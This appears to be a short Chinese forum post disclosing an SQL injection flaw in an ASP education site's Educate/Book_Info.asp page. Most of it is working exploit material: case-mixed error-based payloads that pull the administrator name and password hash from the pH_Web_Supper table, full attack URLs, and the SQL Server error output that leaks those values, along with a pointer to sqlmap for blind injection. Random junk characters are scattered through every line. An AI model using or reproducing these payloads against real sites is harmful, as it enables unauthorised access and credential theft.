漏洞出现在Educate/Book_Info.asp ; k2 u# v. g/ }5 f- z
' `! |" I% y( ]- F1 W* T此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
4 F$ t. N! L7 W6 l! t
/ }6 G, d3 q9 |! Rexp:如下% c7 e, z- o) ~7 B% P9 G0 Y3 z
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper). Q7 ], M( P5 @7 X
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)$ p2 g x% @5 h0 C7 Y* z
/ s- |2 w3 t+ t/ [
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
# L4 w# x+ L% E( r3 e
. y) L" r6 l: Q4 }Microsoft OLE DB Provider for SQL Server 错误 '80040e07'& r5 E- r- V/ Y4 ]- [ I9 W
8 W: ?- j1 @' Z& n) h3 ^
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
& T! F+ h! J, d0 a " ]: N: L9 t: o5 a
/Educate/Book_Info.asp,行 8
+ r3 b; F# f* o% h6 Y
" \) V3 V" r1 e$ }& X1 zhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
+ U q2 }6 m' `( l7 ?. x' o/ i( y ; ], A% q% \1 G: Q
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'6 \) l! w1 V% t/ \$ ]+ ^
9 F/ c: |4 P6 V" a$ X" b将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。8 K0 [0 ^3 W+ }9 B; B
5 j1 R% d- k: ]: j: p- u3 d) o/Educate/Book_Info.asp,行 8
0 \/ [9 y" r" ? |